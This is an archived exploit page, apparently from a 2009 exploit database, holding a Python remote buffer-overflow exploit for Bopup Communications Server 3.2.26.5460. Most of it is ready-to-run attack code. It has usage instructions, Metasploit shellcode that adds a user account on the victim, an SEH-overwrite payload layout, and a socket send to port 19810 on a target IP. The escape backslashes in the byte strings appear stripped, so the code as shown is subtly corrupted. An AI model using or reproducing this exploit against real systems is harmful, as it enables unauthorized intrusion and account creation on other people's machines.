Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)
# Published : 2009-06-29
# Author : His0k4
# Previous Title : dWebPro 6.8.26 (DT/FD) Multiple Remote Vulnerabilities
# Next Title : Cpanel (lastvisit.html domain) Arbitrary File Disclosure Vuln (auth)

#!/usr/bin/python
#[*] Usage : python bopup.py [target_ip]
# _  _   _         __    _     _ _  
#| || | (_)  ___  /    | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  __/  |__   |_| 
#
#[*] Bug     : Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)
#[*] Tested on :    Xp sp3 (EN)(VB)
#[*] Refer	:	mu-b
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ)


import socket,sys,struct
from time import *

host = sys.argv[1]

def banner():
        print "n[x] Bopup Communications Server Remote BOF Exploit (SEH)n"
        print "[x] By: His0k4n"
 
if len(sys.argv)!=2:
        banner()
        print "Usage: %s <ip>" %sys.argv[0]
        sys.exit(0)

# win32_adduser -  PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x44x7Ax32x37x44x7Ax32x37x29xc9x83xe9xcdxd9xeexd9"
"x74x24xf4x5bx81x73x13x05x16xf2x06x83xebxfcxe2xf4"
"xf9xfexb6x06x05x16x79x43x39x9dx8ex03x7dx17x1dx8d"
"x4ax0ex79x59x25x17x19x4fx8ex22x79x07xebx27x32x9f"
"xa9x92x32x72x02xd7x38x0bx04xd4x19xf2x3ex42xd6x02"
"x70xf3x79x59x21x17x19x60x8ex1axb9x8dx5ax0axf3xed"
"x8ex0ax79x07xeex9fxaex22x01xd5xc3xc6x61x9dxb2x36"
"x80xd6x8ax0ax8ex56xfex8dx75x0ax5fx8dx6dx1ex19x0f"
"x8ex96x42x06x05x16x79x6ex39x49xc3xf0x65x40x7bxfe"
"x86xd6x89x56x6dxe6x78x02x5ax7ex6axf8x8fx18xa5xf9"
"xe2x75x9fx62x2bx73x8ax63x25x39x91x26x6bx73x86x26"
"x70x65x97x74x25x72x88x26x37x21xd2x29x44x52xb6x26"
"x23x30xd2x68x60x62xd2x6ax6ax75x93x6ax62x64x9dx73"
"x75x36xb3x62x68x7fx9cx6fx76x62x80x67x71x79x80x75"
"x25x72x88x26x2ax57xb6x42x05x16xf2x06")


payload = 'x01x00x00x00'
payload += 'x41'*(821-len(shellcode))
payload += shellcode
payload += 'x42'*27	#padding
payload += 'xE8xFCxFExFFxFF' #Call back
payload += 'x43'*8	#padding, escaping from the x00 monster :p
payload += 'xEBxF1xFFxFF' #short jump
payload += 'xE0x14x40x00' #p/p/r bcssrvc (universal)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	s.connect((host,19810))
except:
	print "Can't connect to server!n"
	sys.exit(0)

s.send(payload+'rn')
print("[+] Done!")
s.close()

# www.Syue.com [2009-06-29]